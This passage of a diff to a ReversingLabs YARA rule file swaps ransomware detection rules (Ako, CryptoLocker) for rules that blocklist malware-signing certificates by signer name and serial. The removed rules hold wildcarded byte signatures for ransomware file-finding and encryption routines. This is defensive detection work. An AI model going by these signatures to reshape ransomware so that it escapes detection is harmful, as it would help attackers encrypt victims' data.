-            72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 16 2A 02 7B ?? ?? ?? ?? 2C ?? 03 72 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 16 2A 02 7B ?? ?? ?? ?? 2D ?? 03 72 ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 2D ?? 16 2A 03 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 03 73 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            20 ?? ?? ?? ?? 6A 31 ?? 16 0C DE ?? DE ?? 26 DE ?? 02 28 ?? ?? ?? ?? 07 28 ?? ?? ?? ??
-            2A 08 2A
-        }
-		$encrypt_files_p1 = {
-            02 03 28 ?? ?? ?? ?? 2C ?? 02 7B ?? ?? ?? ?? 2C ?? 02 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            02 7B ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 2B ?? 02 03 72
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 02 7B ?? ?? ?? ?? 2C ?? 03 72 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 2C ?? 02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 2A
-        }
-		$encrypt_files_p2 = {
-            1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 02 20 ?? ?? ??
-            ?? 7D ?? ?? ?? ?? 02 17 7D ?? ?? ?? ?? 02 17 7D ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ??
-            ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 1B 28 ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 1F
-            ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 2B ?? 12 ?? 28 ?? ?? ?? ?? 0B 02 07
-            28 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            DC 02 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2A
-        }
-		$encrypt_files_p3 = {
-            28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 26 73 ?? ?? ?? ?? 0A 06 20 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            06 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 18 6F ?? ?? ?? ?? 04 14 73 ?? ?? ?? ?? 0B 06 07 06
-            6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 07 06 6F ?? ?? ?? ?? 1E 5B 6F ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 06 1A 6F ?? ?? ?? ?? 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 18 73 ??
-            ?? ?? ?? 0C 08 06 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 0D 03 19 73 ?? ?? ?? ?? 13 ?? 20 ??
-            ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 2B ?? 09 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11
-            ?? 8E 69 6F ?? ?? ?? ?? 25 13 ?? 16 30 ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 09
-            2C ?? 09 6F ?? ?? ?? ?? DC 08 2C ?? 08 6F ?? ?? ?? ?? DC 03 28 ?? ?? ?? ?? 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CONSTRUTORA NOVO PARQUE LTDA - ME" and pe.signatures [ i ] . serial == "78:d1:81:7e:bc:f3:38:b4:e9:c8:10:f9:74:0a:72:6b" and 1431734400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Ako : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_45Fbcdb1Fbd3D702Fb77257B45D8C58E : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Ako ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "00d67696-998c-5bc3-95e7-0320ca558cdb"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "6bfd7c1d-2608-5ca0-8e1e-04c73588895a"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Ako.yara#L1-L152"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "488e9b528f75fcfaa8dd19859801e6e5a73575c33cd70c98ebaa9ae93025018b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13692-L13708"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "441e10f49515d75ee9e8983ba4321377fee13a91ca5eeddc08b393136ce8ccfd"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Ako"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_network_shares_win32_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 8B 45 ?? 50 8D 4D ?? E8 ?? ??
-            ?? ?? 8B 4D ?? 81 C1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 C8 85 C9 0F 85 ?? ?? ?? ?? 8B
-            4D ?? E8 ?? ?? ?? ?? 0F B6 D0 85 D2 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 45
-            ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ?? ?? 0F B6 D0 85 D2 0F
-            85 ?? ?? ?? ?? 8D 45 ?? 50 8B 4D ?? 83 C1 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ??
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B 4D ?? E8 ?? ?? ?? ?? 50 8D 95
-            ?? ?? ?? ?? 52 8B 4D ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? E8 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 52
-            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
-        }
-		$encrypt_network_shares_win32_p2 = {
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 50 8D 95 ??
-            ?? ?? ?? 52 8B 4D ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? E8 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 52
-            8B 4D ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
-            ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ??
-            E8 ?? ?? ?? ?? 0F B6 C8 85 C9 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 55 ??
-            83 C2 ?? 89 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 39 45 ?? 73 ?? 83 7D ?? ?? 76 ?? 8B 45
-        }
-		$encrypt_network_shares_win32_p3 = {
-            33 D2 B9 ?? ?? ?? ?? F7 F1 85 D2 75 ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 8D 4D ?? E8
-            ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 89 45 ?? EB ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ??
-            8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 55 ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ??
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            8B 4D ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8B 4D ?? E8 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 50 8D 95 ?? ?? ?? ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ??
-            ?? 50 8B 4D ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 8D
-            4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
-            ?? 8A 45 ?? EB ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
-            ?? ?? 32 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D
-            C2
-        }
-		$find_files_win32_p1 = {
-            8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 C1 ?? 66 3B C3 75 ?? 8B
-            7D ?? 2B CA D1 F9 8B C7 41 F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 56 8D 5F ?? 03
-            D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ??
-            83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ??
-            85 C0 75 ?? 8B 7D ?? 8B CF E8 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 56 E8 ?? ?? ?? ?? 59 EB
-            ?? 8B 47 ?? 89 30 83 47 ?? ?? 33 DB 6A ?? E8 ?? ?? ?? ?? 59 8B C3 5E 5F 5B 8B E5 5D
-            C3 33 C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ??
-            ?? ?? 33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 89 8D ?? ?? ?? ?? 56 57 3B D3 74
-            ?? 0F B7 02 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 84 C0 75 ?? 83 EA ?? 3B D3 75 ?? 8B
-        }
-		$find_files_win32_p2 = {
-            8D ?? ?? ?? ?? 0F B7 32 83 FE ?? 75 ?? 8D 43 ?? 3B D0 74 ?? 51 33 FF 57 57 53 E8 ??
-            ?? ?? ?? 83 C4 ?? EB ?? 56 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 2B D3 0F B6 C0 D1 FA 42
-            F7 D8 68 ?? ?? ?? ?? 1B C0 33 FF 23 C2 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B
-            85 ?? ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74
-            ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B
-            48 ?? 2B 08 C1 F9 ?? 6A ?? 89 8D ?? ?? ?? ?? 59 66 39 8D ?? ?? ?? ?? 75 ?? 66 39 BD
-            ?? ?? ?? ?? 74 ?? 66 39 8D ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 50 FF B5 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ??
-            ?? 50 56 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 8B 85 ?? ?? ?? ?? 59 75 ?? 8B 10 8B 40 ?? 8B
-            8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50
-            8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
-        }
-		$encrypt_files_win32_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 83 7D ?? ?? 74 ?? 83 7D ?? ??
-            75 ?? 32 C0 E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8B 4D ?? E8 ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 73 ?? 32 C0 E9 ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? 33 C9 89 4D ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 32
-            C0 E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8B 8D ?? ?? ?? ??
-            51 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? 33 D2 89 55 ?? C7 45 ?? ?? ?? ?? ?? 33 C0 89 45 ?? 0F 57 C0 66 0F 13 85 ??
-            ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 81 C1 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 D2 ?? 89 8D
-            ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 0F 8F ?? ?? ?? ?? 7C ?? 8B
-            8D ?? ?? ?? ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? 6A ?? 8D 55 ?? 52
-        }
-		$encrypt_files_win32_p2 = {
-            8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50
-            68 ?? ?? ?? ?? 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0
-            75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ??
-            ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0
-            75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 05 ?? ?? ?? ?? 89 45 ?? 8B 4D ?? 3B 4D ??
-            0F 83 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 03 45 ?? 50 6A ?? 8D 4D ??
-            E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 45
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 6A ?? 8B 4D ?? 51 8B 4D ?? E8 ?? ?? ?? ?? 0F B6 D0
-            85 D2 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9
-            ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 50 8B 55
-            ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8
-            ?? ?? ?? ?? 8A 45 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? EB ?? E9 ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 4D
-            ?? 8B 95 ?? ?? ?? ?? 89 55 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 89 85
-        }
-		$encrypt_files_win32_p3 = {
-            8B 8D ?? ?? ?? ?? 89 4D ?? 8B 95 ?? ?? ?? ?? 89 55 ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51
-            8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51
-            8B 4D ?? 83 C1 ?? E8 ?? ?? ?? ?? 50 8B 4D ?? 83 C1 ?? E8 ?? ?? ?? ?? 50 8B 55 ?? 52
-            FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 83 C1 ?? E8 ?? ?? ?? ?? 39 45 ?? 75 ?? 0F 57
-            C0 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 4D
-            ?? 89 4D ?? 8B 55 ?? 89 55 ?? 6A ?? 8D 45 ?? 50 6A ?? 8D 4D ?? 51 8B 55 ?? 52 FF 15
-            ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? 8A 45 ?? EB ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ??
-            ?? ?? ?? 8A 45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B
-            E5 5D C2
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ding Ruan" and pe.signatures [ i ] . serial == "45:fb:cd:b1:fb:d3:d7:02:fb:77:25:7b:45:d8:c5:8e" and 1476662400 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_4B5D8Ed5Ca011679F141F124 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "c8bc0968-29d0-51a9-8cfe-7c8f447cef3d"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13710-L13726"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "39ff0d5fd711524ce181596033d1d51579cd086eb20b87722aebf39623bbaa17"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_win32_p* ) ) and ( all of ( $encrypt_files_win32_p* ) ) and ( all of ( $encrypt_network_shares_win32_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "4b:5d:8e:d5:ca:01:16:79:f1:41:f1:24" and 1480644725 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Win32_Ransomware_Cryptolocker : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Cert_Blocklist_33671F1Bcbd0F5E231Fc386F4895000E : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects CryptoLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8cc3ac4b-9179-5e2c-97e1-65304f9dfe22"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "0863e1ed-7b9c-5a60-82ac-eadc3c23fbd9"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.CryptoLocker.yara#L3-L154"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "08430b0c5689840d592bdda5dbc2ed06e0d0fa1e2c0f19aff4316580c6a0b23d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13728-L13744"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "9199c8d76e3390ec9038808b4e88b803b3f3d6966af6206d0c9968d9ab673f31"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "CryptoLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$file_loop_1 = {
-            55 8B EC 83 EC ?? 53 56 8B D9 57 89 5D ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 32 C9 83 7D ?? ?? 88 4D ?? 0F 86 45 01
-            00 00 8B 5D ?? 0F 57 C0 66 0F 13 45 ?? 84 C9 74 08 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? FF 75 ?? FF 33 FF 15 ??
-            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 FF 33 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 75 ??
-            6A ?? 8B 49 ?? 6A ?? 52 56 8B 01 6A ?? 89 55 ?? 8B 00 FF D0 84 C0 0F 84 E6 00 00 00 FF 15 ?? ?? ?? ?? 8B 7D ?? 33 D2 89
-            45 ?? 8B D8 85 FF 72 18 77 08 81 FE ?? ?? ?? ?? 76 0E B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB 05 8B C6 89 7D ?? 3B D0 73
-            0F 8B 45 ?? 8D 0C 13 8B 40 ?? 88 0C 02 42 EB CC 8B 5D ?? 85 FF 8B FE 75 04 85 F6 74 6B 85 DB 77 0E 72 08 81 FF ?? ?? ??
-            ?? 73 04 8B F7 EB 05 BE ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 45 ?? 56 FF 70 ?? 8B 45 ?? FF 30 FF 15 ?? ?? ?? ?? 85 C0 74 ??
-            39 75 ?? 75 ?? 8B 45 ?? 2B FE 8B 55 ?? 83 DB ?? 2B D7 8B 48 ?? 8B 45 ?? 1B C3 50 8B 31 52 FF 75 ?? FF 75 ?? 8B 06 6A ??
-            FF D0 84 C0 74 34 85 DB 77 AD 72 04 85 FF 75 95 8B 5D ?? FF 33 FF 15 ?? ?? ?? ?? 8A 4D ?? FE C1 0F B6 C1 88 4D ?? 3B 45
-            ?? 0F 82 C6 FE FF FF B0 ?? 5F 5E 5B 8B E5 5D C2
-        }
-		$file_loop_2 = {
-            55 8B EC 83 EC ?? 53 56 8B D9 57 89 5D ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 32 C9 83 7D ?? ?? 88 4D ?? 0F 86 50 01
-            00 00 8B 5D ?? 0F 57 C0 66 0F 13 45 ?? 84 C9 74 08 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? FF 75 ?? FF 33 FF 15 ??
-            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 FF 33 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 49 ??
-            8B 75 ?? 8B 01 6A ?? 8B 00 6A ?? 52 56 6A ?? 89 55 ?? FF D0 84 C0 0F 84 F1 00 00 00 FF 15 ?? ?? ?? ?? 8B 7D ?? 89 45 ??
-            33 D2 8B D8 85 FF 72 18 77 08 81 FE ?? ?? ?? ?? 76 0E B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB 05 8B C6 89 7D ?? 3B D0 73
